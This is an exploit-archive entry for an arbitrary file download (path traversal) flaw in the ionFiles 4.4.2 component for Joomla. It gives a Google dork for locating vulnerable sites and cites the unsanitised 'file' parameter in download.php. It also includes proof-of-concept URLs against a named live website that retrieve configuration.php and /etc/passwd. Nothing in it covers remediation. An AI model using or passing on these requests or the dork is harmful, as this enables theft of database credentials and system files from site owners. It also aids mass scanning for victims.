Joomla Component ionFiles 4.4.2 File Disclosure Vulnerability

2008-10-22T00:00:00
ID 1337DAY-ID-3933
Type zdt
Reporter Vrs-hCk
Modified 2008-10-22T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =============================================================
Joomla Component ionFiles 4.4.2 File Disclosure Vulnerability
=============================================================



[o]------------------------------------------------------------------------------------[x]
 |  Arbitrary File Download Vulnerability                                               |
[o]------------------------------------------------------------------------------------[o]
 |  Software : ionFiles 4.4.2 Component for Joomla! CMS                                 |
 |  Vendor   : http://forum.codecall.net/                                               |
 |  Date     : 23 October 2008                                                          |
 |  Author   : Vrs-hCk                                                                  |
[o]------------------------------------------------------------------------------------[o]

[»] Google Dork

    inurl:com_ionfiles

[»] Vulnerable

    ./download.php
	
	Line 32: $file = $_GET['file'];
    Line 33: $download = $_GET['download'];
    Line 66 - 91

[»] Exploit

    http://[site]/[path]/com_ionfiles/download.php?file=[path_file]&download=1

[»] Proof of Concept

    http://esecutech.com/components/com_ionfiles/download.php?file=../../configuration.php&download=1
    http://esecutech.com/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1

[o]------------------------------------------------------------------------------------[x]




#  0day.today [2018-03-19]  #